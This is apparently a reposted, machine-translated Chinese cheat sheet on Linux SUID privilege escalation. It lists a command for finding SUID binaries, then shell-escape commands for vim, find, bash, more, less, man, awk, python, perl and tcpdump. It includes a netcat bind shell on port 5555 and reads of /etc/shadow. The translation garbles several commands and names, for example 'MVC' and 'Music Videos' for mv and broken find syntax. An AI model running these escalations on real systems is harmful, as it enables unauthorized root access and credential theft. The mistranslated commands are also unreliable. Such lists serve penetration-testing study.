This article non-original, as a note to facilitate post queries, the original micro-channel public number of "black and white way" if infringement contact deleted
What is suid?
Popular understanding for the implementation of this program when other users can use this program to owner / group permissions.
Common commands can be used to mention the right of suid
Vim find Bash More Less cp
chmod
ash/linux shell
awk
MVC
man
python
tcpdump
查找suid文件
the Find / -perm -u = s The -type f 2> / dev / null / representation from the top of the file system (root) to start and find each directory -perm express permission to search the following -u = s means the search owned by root file -type means that we are looking for the file type f represent regular files, not directories or special files 2 for the second file descriptor of the process, namely stderr (standard error) > redirects / dev / null is a special the file system object, it will drop to write all the contents.
Vim
Vim是Linux环境下的一款文件编辑器。但是,如果以SUID运行的话,它会继承root用户的权限,因此可以读取系统上的所有文件。
vim.tiny # Press ESC key :set shell=/bin/sh :shell
If the Find command is run in Suid permission to do so, then all commands will be executed by find execute with root privileges.
touch pentestlab find pentestlab -exec whoami \;
Most of the Linux operating system are installed netcat, it can also be used to elevate privileges to the root.
pentestlab -exec netcat -lVP the Find 5555 -e / bin / SH \;
connections will go directly to the shell of a Root privileges.
-
netcat 192.168.1.189 5555
-
id
-
cat /etc/shadow
Bash
bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
more /home/pelle/myfile !/bin/bash
Less
less /etc/passwd !/bin/sh
sudo sh -c 'cp $(which cp) .; chmod +s ./cp'
sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod'
sudo ash
awk 'BEGIN {system("/bin/bash")}'
Music Videos (temporarily Example No)
Use cover mv / etc / shadow or / etc / sudoers
man
man passwd !/bin/bash
import os os.system("/bin/bash")
perl
exec "/bin/bash";
ruby / lua / etc have similar
tcpdump
echo $'id\ncat /etc/shadow' > /tmp/.test chmod +x /tmp/.test sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
后续再找到再补充